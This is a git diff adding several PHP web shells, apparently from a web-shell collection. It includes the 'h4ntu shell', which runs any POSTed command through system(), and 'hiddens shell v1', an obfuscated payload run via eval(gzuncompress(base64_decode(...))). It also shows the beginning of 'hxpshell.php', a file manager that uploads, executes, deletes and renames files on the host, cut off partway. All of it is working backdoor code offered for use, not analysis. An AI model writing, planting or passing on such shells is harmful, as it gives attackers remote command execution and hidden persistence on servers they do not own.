+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
+
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
+  </TR>  
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
+  </TR>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+
+<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
+</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
+<font face="courier new" size="2" color="777777">cmd : 
+<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
+<br>
+<INPUT TYPE="submit">
+</font></FORM>
+
+<hr color=777777 width=100% height=115px>
+
+<pre>
+<?
+$cmd = $_POST['cmd'];
+  if (isset($chdir)) @chdir($chdir);
+  ob_start();
+  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
+  $output = ob_get_contents();
+  ob_end_clean();
+  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+exit;
+?>
+</pre>
diff --git a/php/h4ntu_shell_[powered_by_tsoi].php b/php/h4ntu_shell_[powered_by_tsoi].php
new file mode 100644
index 0000000..eb61f3d
--- /dev/null
+++ b/php/h4ntu_shell_[powered_by_tsoi].php
@@ -0,0 +1,78 @@
+<title>h4ntu shell [powered by tsoi]</title>
+<?php
+echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
+?>
+
+<?php
+  closelog( );
+  $user = get_current_user( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $ver = phpversion( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+  if(!$whoami)$whoami=exec("whoami");
+?>
+<meta name="generator" content="Namo WebEditor v5.0">
+<br>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
+
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
+  </TR>  
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
+  </TR>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+
+<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
+</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
+<font face="courier new" size="2" color="777777">cmd : 
+<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
+<br>
+<INPUT TYPE="submit">
+</font></FORM>
+
+<hr color=777777 width=100% height=115px>
+
+<pre>
+<?
+$cmd = $_POST['cmd'];
+  if (isset($chdir)) @chdir($chdir);
+  ob_start();
+  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
+  $output = ob_get_contents();
+  ob_end_clean();
+  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+exit;
+?>
+</pre>
diff --git a/php/hiddens shell v1.php b/php/hiddens shell v1.php
new file mode 100644
index 0000000..3e43158
--- /dev/null
+++ b/php/hiddens shell v1.php	
@@ -0,0 +1 @@
+<?$d='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';eval(gzuncompress(base64_decode('eNpdUGFrwjAQ/SslZLRFpHPMfdCkFfYDJsxvY5PYnGshTbIm1bnS/76LVZj7csl7vHvv7qhVfOV8q0An1ArneO0c+IRu1y+vm7c4UPF7WjRy/p9bJLfSSrgqSG/xInTGcZqmS/onSvKdcPD0uJVQGglIoGBv2oRqfr+kmlGFdTJJeyp7qgdeVm1iWpmMMP04/8MkCO+oVQP2D/U+OK8+fzpdmsa24NzZuYeDUAkpcipZQVAIykFf5KzyjcIKQuasAS+iyns7ha+uPnDybLQH7aebkwUSlSPixMO3z0LjMior0eIJ+LHW0hzddPYwn5Gc+doryNc43BHHZNmIWTbm7Iw85axEL2hzhjs3EUZXRnISDof9tbadjzzGcmIvLiTSorlgEmW3Itftmtqf6SwY4nP1z8a4bNy0GH4BG4Kl3A==')));?>
\ No newline at end of file
diff --git a/php/hxpshell.php b/php/hxpshell.php
new file mode 100644
index 0000000..f59f9b6
--- /dev/null
+++ b/php/hxpshell.php
@@ -0,0 +1,2061 @@
+<?php
+/*
+ * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
+ * Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
+ *
+ * Bu Kod Tamamiyle Özgür Yazilimdir.
+ * Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
+ * Programin amaci ftp olmadan hostunuza baglanti kurup 
+ * Dosya ekleyip kaldira bilmektir.
+ * Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
+ * -------------------------------------------------------------------------
+ * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
+ * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
+ * -------------------------------------------------------------------------
+ *
+ * iMHaBiRLiGi PhpFtp V1.1
+ * =========================================================================
+ *
+ * BeweiS
+ * <BeweiS@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * MicroP_
+ * <MicroP_@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * Libertical
+ * <libertical@imhabirligi.com>
+ *    iMHaBiRLiGi Yönetim
+ *    C++, Delphi,Programlama ve Linux Hastasi
+ *
+ * PowerGhost
+ * <powerghost@imhabirligi.com>
+ *    iMHaBiRLiGi Sistem Danismani
+ *    Sistem Danismani
+ *    
+ *  BadSector
+ *  ozgurkaleli@yahoo.com
+ *  iMHaBiRLiGi Yönetim
+ *   VicualBasic-Delphi Programlama
+ *   Sistemdanismani ve Linux Hastasi
+ *
+ * Bu kodun yaziliminda ismi gecen her arkadasimizin
+ * Katkilari bulunmustur.
+ * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize
+ * Katkida bulunmuslardir.
+ * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz
+ * http://www.imhabirligi.com
+ *<iMHaBiRLiGi@imhabirligi.com>
+/* ------------------------------------------------------------------------- */
+
+/* Diller :
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'se' - Swedish
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of your filenames:
+ */
+$charset = 'ISO-8859-1';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the Düzenle textarea
+ */
+$Düzenlecols = 80;
+$Düzenlerows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (reTasi # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'indir':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) {
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'Sil':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Sild', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Sild', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_Sil') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Degistir':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (!@file_exists($dest) && @Degistir($file, $dest)) {
+			listing_page(notice('Degistird', $file, $dest));
+		} else {
+			listing_page(error('not_Degistird', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
